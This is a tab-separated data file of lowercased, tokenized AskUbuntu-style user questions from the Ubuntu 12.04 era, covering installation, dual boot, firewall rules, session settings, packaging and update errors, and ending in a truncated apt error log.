146162	how to install javafx in ubuntu 12.04 ?	i download javafx from here . i placed it in my home directory ( anto ) under the name javafx . then i did something like this : vi ~/.bashrc and added the following lines : javafx_home=/anto/javafx/rt/lib/jfxrt.jar export path= $ path : $ javafx_home but after providing the classpath , i tried running : groovy myprogram ( which depends on the javafx classpath ) . but that throws me an error . where i went wrong ?
146163	how do i allow all possible ips for gmail servers through my ufw firewall ?	i am currently using the following rule : ufw allow out from my_local_ip to any port 587 this is a little too lax for my liking . i would like to tighten it up and restrict it to only gmail 's smtp server ip addresses , but they are always changing . i used to just wait until an outgoing email did n't make it to its destination , then check syslog for the ip address that was blocked , then add that to the ufw configure script . however , now i have a need for much more reliability . is there any way to use smtp.gmail.com in ufw ? i do n't think so , but thought i would ask . any other ideas ? thanks . update taking izx 's suggestion , i obtained the following ( abbreviated ) info from whois : $ whois 74.125.53.108 ... netrange : 74.125.0.0 - 74.125.255.255 cidr : 74.125.0.0/16 ... using this info i created the following command in my ufw configuration script ( i realize there are other ranges to open , this is just an example ) : ufw allow out from 192.168.2.5 to 74.125.0/24.0/24 port 587 but ufw does not like that . so i changed it to : ufw allow out from 192.168.2.5 to 74.125.0.0/24 port 587 this ufw accepted but obviously this will only block any address in this range with 0 as the third octet . so how do i get from 0-255 for the third octet as well ?
146165	how to i compile uget from source ?	i 've downloaded uget from its source fourge link . it is a tar.gz file . i have read that i could install a file of this type by extracting its contents and following these steps . ./configure make install but , when i give ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane - configure error am i following the steps ? what am i missing ? i know the easiest way is to do sudo apt-get install uget but i want to know the reason for its failure .
146168	submitting some snapshots of nature from my collection	i want to submit some of snapshots of nature taken by me to ubuntu in order to put it in the main ubuntu operating system as background pictures . may i do so ? what 's the procedure ? i will be waiting for your reply thanks
146170	unity takes ages to start after log in	after i upgraded to 12.04 from 11.10 , unity has started taking too long to start . booting from zero to burg takes about 3 sec , burg to login screen takes about 5-7sec ... n then login screen to unity takes more than 2 min ... why so ? i 've even tried stuff like disableing networking and stuff ...
146172	skype installed or not installed , that is the question	after upgrading 11.10 to 12.04 , i noticed that skype 2.2.0.35 was no longer on the sidebar of icons . found it in dash and it runs but no sound . figured i 'd check ubuntu software center and reinstall but it indicates a different version - 2.2.0.35-0precise3 - and indicates that skype is not installed . attempting to go ahead and install errors saying that it ca n't install when skype is already installed . sudo apt-get remove skype ... then it says package skype not installed tried to update apt-get but that did n't make any difference . seems like it would be best to straighten this all out so it 's right and , presumably , the newer version is probably better to have installed . can anyone step me through how to do so ?
146178	attempted wubi install corrupted vista	tried to install wubi through google chrome on my vista machine . got through the usual warning about running new software , selected `` continue '' and waited for a prompt about where to install wubi . never got one ... waited about 30 minutes ( computer still running fine ) ... decided to reboot and try again . ooooops . was not able to reboot vista . ouch . when i run a vista recovery cd it tells me there is an `` x : '' drive on what used to be my c : drive and it can not find a vista install to recover . anyone seen this ? it is making me very happy ... thanks ! ! ! ! ! ! ! ! ! ! ! !
146179	ubuntu philosophy question	i was just switching from windows to ubuntu and i started to read this . and there were quite a few things i did not understand . one was : '' openoffice decided not to have a learning curve '' another was : '' firefox tries very hard to make sure pages written in 1995 look like they did in 1995. `` and finally : '' windows is n't a poor man 's linux . '' in that final statement , should n't it be the opposite ?
146191	ubuntu 12.04 does n't seem to execute my .profile file	( i 'm kinna n00bish ) 1 : i had ubuntu 11.10 installed , then upgraded to 12.04 . 2 : i had a script in my .profile file to turn off my laptop 's touchpad ( it worked , and was executed on login ) 3 : now it does n't get executed on login . 4 : if i 'source .profile ' the script still works . 5 : still using gnome ( if that matters ) i need that script to be run on login , so what should i do ? should i put my personal scripts in another file , or is there a way to get ubuntu to execute my file again ? thx , you guys rule !
146193	why do the nouveau drivers work better than the nvidia ones ?	i have a bit of a weirdie here . my rig uses an nvidia geforce 8600 gts in a pcie x16 slot . up to about a year ago , no problems with the card . i then started getting random crashes . they got more frequent . now , first thought : it 's an old card . but i do n't have the bucks to buy a new one , and my mobo does n't have the dvi input that my monitor needs . so , i decided to take a shot with the nouveau drives . amazingly , they have worked flawlessly . does anyone have a guess as to why ?
146194	how do i setup a pppoe connection in ubuntu ?	i have a bridged adsl modem ( bsnl for all those from india ) . i need to connect to it via my ubuntu 12.04 , but i am not able to figure out how to form that connection . i am able to connect to that router via wifi but after that i am not able to connect to the internet . how do i go about it . please try and provide a simple solution as i am fairly new to the linux environment .
146195	i installed ubuntu 12.04 on a dell inspiron 1501 along side windows vista using the windows installer but it wont boot into ubuntu	i installed ubuntu 12.04 on a dell inspiron 1501 with an amd 64 along side windows vista using the windows installer but it wont boot into ubuntu . it shows that ubuntu is on the system when my computer boots up but when i select it to load it goes into a black screen and displays some error messages and tells me that the is no operating system installed . this is the error that i get : try ( hdo , 0 ) : fat16 : no wubildr try ( hdo , 1 ) ntfs : error : `` prefix '' is not set . symbol not found : 'grub_file_get_device_name' aborted . broadcom undi pxe-2.1 v2-1.0 copyright ( c ) 2000-2006 broadcom corporation copyright ( c ) 1997-2000 intel corporation all rights reserved pxe-ec8 : pxe structure was not found in undi driver code segment . pxe-m0f broadcom pxe rom operating system not found how can i fix this ? i have tryed re-installing it but i get the same error .
146198	xubuntu internet thing says it is connected to internet but everything else says its not	the wireless indicator in the corner says i 'm connected but applications like firefox and the software center say i 'm not .
146206	increasing volume beyond 100 % using keyboard	i am using ubuntu 12.04 lts . i saw , it is possible to increase volume beyond 100 % using sound control gui . i set keyboard shortcut to increase volume , but it increases volume upto 100 % only . how can i increase volume beyond 100 % using keyboard shortcut as i can do with gui ?
146211	how do i have different wallpapers for different sessions ?	i have two sessions - unity and gnome fallback on my laptop . i 'm using unity in portable mode and gnome fallback with second display at home . and i want different wallpapers for unity and fallback sessions . light for unity and dark for fallback . i think , i can use autostart option showonlyin= , but do n't know how . i do n't want switch wallpapers manually every time .
146214	how can i start docky ?	how can i start docky ? when i open it , nothing happens . when i open it in a terminal it just says : [ info 08:25:58.751 ] docky version : 2.1.4 release [ info 08:25:58.760 ] kernel version : 3.2.0.24 [ info 08:25:58.763 ] clr version : 4.0.30319.1 what can i do to make it work ?
146215	alternative to super-w and alt-tab ?	super-w and alt-tab are the normal ways in unity to see hidden windows on the desktop . that 's interesting and sometimes effective , but inferior to other `` textual '' techniques . when i have lots of windows ( which is when i need help finding them ) , the views provided by super-w and alt-tab often make the windows too small to recognize . this leads to slow and annoying repeats of super-w or alt-tab . in contrast , if it would display an icon with the name of the application ( like `` firefox '' , `` nautilus '' , etc ) , that would be much more helpful . now , it is true that often we have multiple instances of an application running , so the behavior should work like this : only one `` firefox icon '' , but then below the `` firefox icon '' there should be one more icon for each instance of the application ( with text that indicates which instance , like filename , web-address , etc ) . is there such an option or application ?
146216	is it possible to remove or fix a node from maas after juju bootstrap ?	i do n't want to destroy environment of juju . is there any way that let me to delete a node in maas with minium changeďź or , if some way can fix the node , that 's perfect . my juju status : machines : 0 : agent-state : running dns-name : d1 instance-id : /maas/api/1.0/nodes/node-7874253a-a891-11e1-b5bb-0800270f9b01/ instance-state : unknown 1 : agent-state : running dns-name : d0 instance-id : /maas/api/1.0/nodes/node-d1ea1f7e-a8d3-11e1-be27-0800270f9b01/ instance-state : unknown 2 : agent-state : not-started dns-name : t2 instance-id : /maas/api/1.0/nodes/node-c17f697a-a93a-11e1-b1a3-0800270f9b01/ instance-state : unknown services : mysql : charm : cs : precise/mysql-2 relations : { } units : mysql/0 : agent-state : started machine : 1 public-address : d0.localdomain tomcat7 : charm : cs : precise/tomcat7-1 relations : cluster : - tomcat7 units : tomcat7/0 : agent-state : pending machine : 2 public-address : null machine 2 is failed , and reboot for some times .
146217	how to downgrade gcc to version 4.1.1 if i use ubuntu 11.10 or 12.04 64-bit ?	it may seems simlar to this question : old version of gcc for new ubuntu but i ca n't solve it with the method provided in that thread i get some error like gcc-4.1 : depends : cpp-4.1 ( = 4.1.2-27ubuntu1 ) but it is not going to be installed can someone tell me how to do it ? thanks
146219	can ubuntu be installed on windows 7 drive that is encrypted with truecrypt ?	i 've been looking everywhere . truecrypt forums and over the ubuntu forums . i have yet to find an answer that comes close to my issue or question . my computer came with windows 7 preinstalled so i have no live disc . the more i get to know ubuntu the more i grow to love it . i have tried to install ubuntu along side windows 7 on both c and d drives of the encrypted disk . when i restart truecrypt asks for password like normal then on first go will load ubuntu , but ubuntu will start then go to a screen with error messages . off the top of my head it was on the lines of `` network time out '' or 'time expired error . '' i really am getting sick of windows . to much garbage in its being . is there anyway to get the installation to run after the whole system is encrypted ? or will i have to unencrypt , install , then re-encrypt ( huge pain in the butt if so for wait time as it writes over ) ? any help on this would be wonderful . thanks .
146221	what does stackapplet `` network error '' mean ?	i just installed stackapplet stackapplet 1.5 using the debian package from the launchpad site . when i first clicked on the preferences button in the menu it tried opening http : //localhost:8150/ in chromium , and i got this error : this webpage is not available the webpage at http : //localhost:8150/ might be temporarily down or it may have moved permanently to a new web address . error 120 ( net : :err_socks_connection_failed ) : unknown error . my chromium is launched with a switch to make it use a socks5 proxy , using this command : chromium-browser -- proxy-server= '' socks5 : //localhost:1080 '' % u i remembered that i was n't using a bypass proxy url list so i added the switch : -- proxy-bypass-list= '' localhost,127.0.0.1 '' to the above command and i was then able to access the preference page without any problems . however , after adding my account information i see the message : network error . in the stackapplet menu . this makes me think that stackapplet might be trying to use the socks5 proxy -- even though it is not set globally , only chromium uses this proxy . i do n't require stacksapplet to use my proxy , in fact it would probably be better if it did n't . so my questions are : what does the network error . message mean ? and what should i do to fix/debug this error ?
146226	lsb_release command not found	i am new to ubuntu os . i am trying to install skype on ubuntu 12.04 . i am following a tutorial that says sudo apt-add-repository âdeb http : //archive.canonical.com/ $ ( lsb_release -sc ) partnerâ but when i execute this command , it says : lsb_release-sc : command not found
146227	ubuntu background network usage	i 'm using ubuntu 12.04 , and i 'd like to understand the source of background network usage . while i 'm not using the network ( e.g . reading ebooks or using offline apps ) , ubuntu keeps fetching data from the internet . from ifconfig , i see the download usage increasing . this happens all the time i 'm connected to the 'net , not just when updates are downloading . because i have a download quota plan i do n't want to use the internet when i 'm doing offline work . why could my internet use be increasing ? what 's responsible for these downloads ?
146234	arabic saudi arabia not available in regional formats list	i installed arabic support in ubuntu 12.04 but there is no arabic saudi arabia in regional formats list . all other arabic regional formats are available e.g . arabic uae , arabic syria , arabic kuwait , arabic bahrain etc but not arabic saudi arabia !
146236	install ubuntu with windows 7	i finally decided to clear my hard disk and start over again . i need to install both ubuntu 12.04 and windows 7 . i currently have two problems : i have installed ubuntu on the fresh 320 gb drive , but when i restart i ca n't boot into my ubuntu , except when i insert the flash drive i used for the installation of my system during the boot process . what 's the best and easiest way to install ubuntu 12.04 on a seperate partition , and how do i go about the partitioning ?
146238	will `` ubuntu for android '' ( 12.04 ) work with the samsung galaxy s2 ?	i 'm trying to buy a new android phone and i own an ubuntu 12.04 computer ... i have the choice of a google galaxy nexus , samsung galaxy s2 and an htc sensation xl . i am aware that the htc already works with it , but i would prefer to buy the samsung . i already have the phone hardware specifications and have checked , but i am not sure about the samsung or the nexus . so which of these phones work with ubuntu 12.04 's 'ubuntu for android ' feature ?
146244	can i create a hybrid software-raid array with disks of different sizes ?	products such as synology offer something called synology hybrid raid http : //www.synology.com/us/products/features/raid.php this raid type allows you to make best use of your disks available by using all the disk space available as long as at least two disks share the same increased size where a typical raid setup would simply `` throw away '' the extra space i would like to build a nas with 4 disks available . i will begin by populating it with 3 x 3tb to give me 6tb usable . by the time i have filled this 6tb i imagine that 4tb disks will have come down in price , so at this stage i would add a 4th 4tb disk to give me an additional 3tb of space . when i next run out of space i will change one of the original 3tb disks with a 4tb disk giving me an additional 1tb of space . this is not possible with a typical raid configuration , only with these `` hybrid raid '' types i am wondering if i can acheive a similar `` hybrid raid '' with ubuntu ? or another linux distro ?
146245	xfce volume adjusting sound applet for 12.04	recently i upgraded the mythbuntu 10.10 to 12.04 which uses xfce , and realised there is no one click volume adjusting sound applet with a slider , like in 10.10 . is there something else to do this ? or is xfce becoming even more minimalist ?
146246	how to change address and name of the computer in linux ubuntu	i have troubles again after upgrading linux to version 12.04 - when i try to update progams and files with `` apt-get update '' it says something like there is no address added to your computer name . so my hostname has name `` marco '' and my hosts file has line `` 127.0.0.1 marco '' so where is problem ? where should i change my name to get it right for updates ? thank you . before on version 11.10 it was working fine . w : failed http : //en.archive.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en something bad happened in the translation `` en.archive.ubuntu.com : http '' ( -5 - the machine name is not assigned to any address )
146247	ubuntu one ( windows ) does not sync files	i have installed the ubuntu one client ( version 3.01 ) for windows xp . the clients seemed to work properly . i uploaded and downloaded files from the folders i added . however after working on some files the client does not update these files . when i look at the cloud folder in my browser there are only the initial versions of my files . if i add some files to my hard disk , the client does not update them either . during the whole process the client says file sync is up-to-date . if i uncheck the folders to be synced and check them again the client works a while , says `` files are up to date '' but still does not update the cloud files ... . please help me .
146248	how to use different input language for different active ( application ) windows ?	i 'm working under 12.04 and suppose i have a firefox windows active ( or in foreground ) with english as input language and i need to type a document in other language using some text editor . with the text editor in foreground ( or active ) and the input language set to a non-english one , when i bring firefox in foreground ( or making it active ) the input language remains set to the non-english and the language flag does not switch to english ( as it would be expected , since i do not alter the language during the whole firefox session ) . because of this , i have to make extra moves and change the input language manually every time i switch from the text editor to firefox and back to text editor . this was not happening with 10.04 , and each application windows had the corresponding input language set to its default or previous session every time i was bringing it to the foreground ! how will i make 12.04 to behave the same way ?
146250	stop using development release of ubuntu	some time ago i updated my system to the development release of ubuntu using these instructions : https : //help.ubuntu.com/10.04/about-ubuntu/c/upgrade.html '' if you would like to install and test the latest development version of ubuntu before it is released , press alt+f2 , type update-manager -c -d into the box and click run . if a development release is available , an update button will appear in the update manager . click it to upgrade to the development version . '' however , now my machine is always trying to update to the latest development packages causing randomness that i ca n't afford . could someone please tell me how to have ubuntu stop updating to the development release ?
146251	how to install 11.10 with wubi ?	all that is available for wubi installation is ubuntu 12.04 , but i strongly prefer 11.10 . is there any way that i can use wubi installer for 11.10 ?
146259	what packages to uninstall for better security ?	i have read a recommendation which was stating that after installing one should remove some packages from the default ubuntu installation , in order to have a more secure server . what are your recommendations for removal ?
146260	is updating via update manager equivalent to updating with apt-get ?	on my desktop ( precise ) i have run system settings > details > install updates from the unity desktop . on my cloud server , also on precise , i can use a vnc session to do the same but instead i have run apt-get update and apt-get upgrade . was my desktop activity equivalent to my server activity or is one of these measures less complete ?
146265	programmaticaly change lightdm autologin session type	i have problem with lightdm setting autologin session type ( using my config tool ) . lightdm logs into previously selected session . i see that autologin-session is unimplemented in version 1.2.1 . maybe i can somehow cheat lightdm ? but it seems program writes actual state when stopping and overwrites my changes to /home/user/.dmrc and /var/cache/lightdm/user.dmrc . at the current i have two sessions : default and kiosk . in /etc/lightdm/lightdm.conf i have line : user-session=desktop but after i logged into kiosk session it starts all the time . changing .dmrc and /var/cache/lightdm/dmrc/user.dmrc does n't work . i think i will try nodm display manager because what i really want to achieve is run gui session choosen by admin in gui config tool . another lower-level tool is rungetty - but i do n't know this program ( i found some tutorials ) . resolved ! finnaly , after 2 days of trying nodm , lxdm , rungetty , etc . i 've found ( not so ) simple solution for lightdm : dbus-send -- system -- type=method_call -- print-reply -- dest=org.freedesktop.accounts /org/freedesktop/accounts/user1000 org.freedesktop.accounts.user.setxsession string : kiosk this sets default xsession to kiosk for user with id 1000 . in future there probably will be option autologin-session in config file doing the same ( marked as unimplemented now ) .
146273	i am unable to download programs from the ubuntu software center with ubuntu 12.04	i just got a new computer and i installed ubuntu 12.04 . with ubuntu 11.10 , i had a really awesome periodic table program that i got from the ubuntu software center . when i tried to download it on 12.04 from the software center , it would not download . it 's called periodic table of elements and the description is a mendeleiev table of the chemical elements .
146282	dual boot ubuntu 12.04 on a thinkpad t420 but keep recovery partition	i have a thinkpad t420 which runs on windows 7 pro and i would like to install ubuntu 12.04 on it via dual boot . but the thing is , i 'd like to keep the thinkvantage recovery partition . i 've been researching and found this : install ubuntu on thinkpad , recovery section must remain intact and http : //www.thinkwiki.org/wiki/rescue_and_recovery but the information does n't seem to be updated for for my situation ( the second link indicates that it wo n't work with windows 7 ) . just wonderin ' if anyone already has experience doing this ? i could create recovery cd/dvd 's but i 'll be more happy i can keep recovery partition and boot information on the hard drive functional ( for future resale purposes ) . any ideas ?
146283	why is vim no longer installed in 12.04 desktops and is there a better alternative ?	what are the reasons and alternatives to the removal of vim from a default ubuntu installation since oneiric 11.10 ?
146286	how can i change power options to make my system `` always on '' ?	power options in 12.04 system settings has only one option : `` suspend when inactive '' , while i ca n't see any obvious settings i can change so that the system is always on - without locking the screen after 10 minutes of inactivity . how can i change power options to make my system `` always on '' ?
146287	ccsm falls ubuntu 12.04	hi i find ccsm keeps crashing in ubuntu 12.04 has any-one can suggest to me how can i prevent from this happening the window opens up and ask to report and i do however it keeps occurring at least 2-3 time a day any-one can he
146294	ubuntu server 11.10 on a lan is refusing connections	my ubuntu installation is on a lan configured on it is email server , likewise-open , nfs , autofs . sometimes it refuses to ping other computers as well as refuse connections from other computers . what could possibly be the problem ?
146305	wubi bcdedit error ?	when i try to uninstall ubuntu ( only to reinstall it , of course ) from windows , i get an error message about a bcdedit error . what is this and how do i fix it ? and yes , i am using wubi .
146308	hit ctrl+c during do-release-upgrade . did i break it ?	i did a do-release-upgrade . during the process i was asked if i wanted to replace my rsync config file in init.d with the new version or keep the existing one . i hit d to look at the diff and then could not get back to the question / install script . i stupidly hit ctrl c and was not returned to the upgrade process but to the shell . i am now worried i have a broken install : ( what should i do ?
146313	do i need separate drivers ( graphics , sound , lan ) after installing ubuntu 12.04	respected sir , do i need separate drivers ( graphics , sound , lan ) after installing ubuntu 12.04. my hardware configuration is : intel core 2 duo e7300 @ 2.66ghz 3.00 gb dual-channel ddr2 @ 800mhz 250gb seagate ( sata ) intel ( r ) g33/g31 express chipset family realtek high definition audio
146315	how to unblock someone in empathy ?	i am using ubuntu 12.04 . i use empathy as my default messenger . i had blocked someone in empathy but now i want to unblock him . the person whom i blocked is using gmail . so , how to unblock that person ?
146317	ddclient - wont update invalid keyword for 'ip ' =	/etc/ddclient.conf use=web , web=checkip.dyndns.org/ , web-skip='ip address' protocol=easydns ssl=yes server=members.easydns.com login=stueng password='****' home.*** . ** edit : i no longer get the keyword error now after waiting a few hours . however , i still have an issue http : //paste.ubuntu.com/1023502/ the above looks succesfull to me , however i am not seeing an update in easydns and i can not resolve the address to the correct address can i get additional debug info out of this to make sure its succesfull ?
146318	windows 7 and ubuntu 12.04 dual boot . how to expand the size of windows partition ?	i do n't want to lose any data or else i would installed them again . there must be a way to increase the partition size .
146320	how do i install kde and retain lightdm as a login manager ?	i want to install kde in my ubuntu 12.04 . i am using lightdm . so how can i fully install kde ? i do not want to remove lightdm . i want kde but without any confliction with it .
146324	vmware virtual machine wo n't boot after 12.04 upgrade	i was running an 11.10 virtual machine on vmware workstation 7.1.5 build-491717 . i tried to upgrade the other day to 12.04 . after everything was downloaded and installed , the system asked to be booted . i 've confirmed , and since then i 've never been able succeed loading the system . when i boot , the screen shows nothing but a blinking cursor , and my caps-lock seems to repeatedly turn on and off . ( which freaked me out : - ) ) when i try to load my previous system ( 11.10 ) , it manage to load , but everything is strange+no network connection . does anyone familiar with the issue ? i 've read some posts but it seems to be ages ago and non-relevant . the gist of the panic from the screenshot is : vfs : can not open root device sda1 please append correct root= boot option available partitions are : sr0 only kernel panic : vfs : unable to mount root fs never had problems before . in fact , linux always ran better on the vm than the ms-win7 . i 'm not such a linux expert - noob treatment would be preferred : -d edit : physical system : i5 2.66 quad , 12 gb ram graphic card ( sux ) nvidia 210 os , win7 ultimate . i 've tried installing the vm toolkit , so i can gain some extra features , but it did n't succeed as well , so my guess is nothing was installed . the console output when trying 2 boot on recovery mode : https : //www.dropbox.com/sh/7vgz3vw5kyv5n9f/m1ifv0rotm @ izx , what am i suppose to do with it ? : - ) what do i need to do to fix the sda1 device ? is this a vm issue ? should i need to copy the settings as appeared on the previous version ? edit tried to run update-initramfs as @ psusi suggested , but got another error . apparently , my /lib/modules/3.2.0.24-generic has nothing in it . i tried copying the modules.dep from another kenrnel ( previous 1 ) but nothing . here 's the console output . dismissed , final solution : fresh install .
146325	no wifi internet with ubuntu 12.04	im with ubuntu 12.04 - dell inspiron 5110 ( 8g ram , i7 cpu ) . when i connect to a router at my place , i get an internal ip i can ping others in the network ( and the router ) , but have no internet . i trided by checking with trough ff , ie and opera and could n't load any pages . i read all other similar topics and nothing helped .
146327	evolution data migration ( on update ) missed all but the first `` accounts '' ( mail , addressbook , calendar ... )	due to a system crash , i had to do a fresh install on a new computer . luckily my harddisk was not affected -- but unfortunately the `` good old 8.04 '' did n't want to boot from it on the new system ... so with 12.04 installed on a fresh harddisk , i copied all evolution folders from the old disk to the corresponding locations ( ~/.evolution plus ~/.gconf/apps/evolution -- the old evo on 8.04 had no ~/.local/share/evolution ) , and started the app . the migration assistant popped up , and i went through -- but in the end , only one of my `` accounts '' in each category was migrated and available : local mail , one of 4 imap accounts ( though data of all 4 accounts where moved to ~/.local/share/evolution ) , one of 4 address books , and so on . not a big deal for the imap stuff , as i just had to configure it ( data are stored on the server in this case ) . but how can i get my addressbooks back ? as described above , starting the `` old installation '' to export those data is not an option , as the old system can not be started anymore . is there a way to fire the migration assistant for a given dataset ( in my case : tell it to just migrate-and-import a single specified addressbook ) ?
146343	how to create a deb package that installs a series of files	i would like to create a brand new deb package to install series of files . if at all possible , i would like to untar the folder containing these files as part of the installation into a known folder location . failing that , some knowledge how to package the source folders and files would be very useful . question is - is this possible and if so - how ? lets give an example : ~/mypluginfolder/ contains the files x , y , a subfolder called abc and inside that another file called z. i want to tar this folder : tar -cvf myfiles.tar ~/mypluginfolder i presume my debian package would look like myfiles.tar.gz myfiles+ppafoss_0.1-1/ myfiles.tar debian changelog , compat , control , install , rules source is it possible to somehow untar myfiles.tar to a known folder location for example /usr/share/rhythmbox/plugins/ thus the final result would be : /usr/share/rhythmbox/plugins/mypluginfolder /usr/share/rhythmbox/plugins/mypluginfolder\x /usr/share/rhythmbox/plugins/mypluginfolder\y /usr/share/rhythmbox/plugins/mypluginfolder\abc\z if - presuming launchpad needs source , advice is sought as to where i should drop the source folders and files into the deb package structure . this will eventually will become a series of individual launchpad ppa packages . what i prefer ( but may not be able to achieve ... ) is to keep my packaging to a minimum - create a series of packages from a template and adjust the bare minimum ( changelog etc + the tar file/file & folder structure ) .
146347	confusion with system clock change in messages ?	in the messages log i can see that my system clock was changed . this was recorded in the log happening at 4pm and the change was to move the system clock to 3.58pm . however , in the next lines of the log they are still recorded as happening at 4pm and not the new time the system clock was changed to- surely the events following should be recorded at the new system clock time ?
146348	micromax usb modem model mmx 352g not recognized in ubuntu 10.04 lts	it recognizes my modem as a mass storage device . can someone provide me step by step instruction on how to get it working ? browsed through some similar questions , none of the answers made sense , but seems like output of lsusb is important , so here goes bus 002 device 004 : id 1c9e : f000 bus 002 device 003 : id 064e : f203 suyin corp . bus 002 device 002 : id 8087:0020 bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0bda:0158 realtek semiconductor corp. mass storage device bus 001 device 002 : id 8087:0020 bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
146354	how do i change the unity launcher color ?	i 'm trying to change the panel and launcher color from gray to green or blue . i 've tried myunity ccsm and the stock settings . but everytime i change the color it does n't stick it reverts after i close the program used .
146362	getting error on downloading updates	err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-control-center-data all 1:3.4.2-0ubuntu0.2 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-settings-daemon amd64 3.4.1-0ubuntu1.1 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libgnome-control-center1 amd64 1:3.4.2-0ubuntu0.2 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-control-center amd64 1:3.4.2-0ubuntu0.2 connection failed [ ip : 91.189.88.22 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main mahjongg amd64 1:3.4.1-0ubuntu2 connection failed [ ip : 91.189.88.25 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnomine amd64 1:3.4.1-0ubuntu2 connection failed [ ip : 91.189.88.28 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-sudoku all 1:3.4.1-0ubuntu2 connection failed [ ip : 91.189.92.151 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-games-data all 1:3.4.1-0ubuntu2 connection failed [ ip : 91.189.92.153 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gnome-orca all 3.4.2-0ubuntu0.1 connection failed [ ip : 91.189.92.155 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main grub-pc amd64 1.99-21ubuntu3.1 connection failed [ ip : 91.189.92.176 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main grub-pc-bin amd64 1.99-21ubuntu3.1 connection failed [ ip : 91.189.92.179 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main grub2-common amd64 1.99-21ubuntu3.1 connection failed [ ip : 91.189.92.181 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.1 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gwibber amd64 3.4.1-0ubuntu1 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gwibber-service all 3.4.1-0ubuntu1 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libgwibber2 amd64 3.4.1-0ubuntu1 connection failed [ ip : 91.189.88.22 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libgwibber-gtk2 amd64 3.4.1-0ubuntu1 connection failed [ ip : 91.189.88.25 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gwibber-service-facebook all 3.4.1-0ubuntu1 connection failed [ ip : 91.189.88.28 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gwibber-service-identica all 3.4.1-0ubuntu1 connection failed [ ip : 91.189.92.151 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main gwibber-service-twitter all 3.4.1-0ubuntu1 connection failed [ ip : 91.189.92.153 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libdevmapper-event1.02.1 amd64 2:1.02.48-4ubuntu7.1 connection failed [ ip : 91.189.92.155 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libedataserverui-3.0-1 amd64 3.2.3-0ubuntu7 connection failed [ ip : 91.189.92.176 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main liblvm2app2.2 amd64 2.02.66-4ubuntu7.1 connection failed [ ip : 91.189.92.179 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libnm-glib-vpn1 amd64 0.9.4.0-0ubuntu4.1 connection failed [ ip : 91.189.92.181 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libqtbamf1 amd64 0.2.4-0ubuntu1 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libreoffice-emailmerge all 1:3.5.3-0ubuntu1 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libreoffice-help-en-us all 1:3.5.3-0ubuntu1 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-2d-shell amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.22 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-2d-panel amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.25 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-2d-spread amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.88.28 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main unity-2d-common all 5.12.0-0ubuntu1 connection failed [ ip : 91.189.92.151 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main libunity-2d-private0 amd64 5.12.0-0ubuntu1 connection failed [ ip : 91.189.92.153 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main linux-libc-dev amd64 3.2.0-24.39 connection failed [ ip : 91.189.92.155 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main policykit-1 amd64 0.104-1ubuntu1 connection failed [ ip : 91.189.92.176 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main python-gobject all 3.2.2-1~precise connection failed [ ip : 91.189.92.179 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main python-software-properties all 0.82.7.1 connection failed [ ip : 91.189.92.181 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main python-zeitgeist all 0.9.0-1ubuntu1 connection failed [ ip : 91.189.92.183 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main remmina-plugin-vnc amd64 1.0.0-1ubuntu6 connection failed [ ip : 91.189.92.188 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main remmina-plugin-rdp amd64 1.0.0-1ubuntu6 connection failed [ ip : 91.189.92.192 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main remmina amd64 1.0.0-1ubuntu6 connection failed [ ip : 91.189.88.22 80 ] err http : //archive.ubuntu.com/ubuntu/ precise-updates/main remmina-common all 1.0.0-1ubuntu6 connection failed [ ip : 91.189.88.25 80 ] err http : 